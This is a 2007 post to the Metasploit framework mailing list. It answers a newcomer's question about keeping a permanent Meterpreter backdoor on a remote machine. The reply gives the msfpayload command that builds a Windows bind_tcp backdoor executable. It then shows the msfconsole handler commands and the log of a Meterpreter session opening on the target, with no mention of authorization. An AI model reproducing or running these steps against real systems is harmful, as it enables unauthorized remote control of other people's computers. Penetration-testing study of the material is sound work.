[framework] Place a Meterpreter backdoor
Ramakrishna Nyayapathi
nramkey at gmail.com
Fri May 11 01:47:18 CDT 2007
Yes there is. In the framework directory,
./msfpayload windows/meterpreter/bind_tcp LPORT=4444 EXITFUNC=thread X >
met_bkdoor.exe
Executing this file on the target machine should set up a meterpreter
backdoor on 4444.
in msfconsole,
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (1.2.3.3:1376 -> 1.2.3.4:4444)
meterpreter >
Hope that helps..
On 5/10/07, BardoBaggins <bardo at mclink.it> wrote:
>
> Hello !
>
> First, I would like to apologize if my question is kinda "dumb". I'm a
> newbie in the field and I'm ever longing for new knowledge.
>
> Anyway, the question is : Is it possible to place a permanent
> meterpreter process running on a remote machine acting as a backdoor ?
>
> Tnx. Bye !!
>
> Bardo
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070511/52984e95/attachment.htm
More information about the framework
mailing list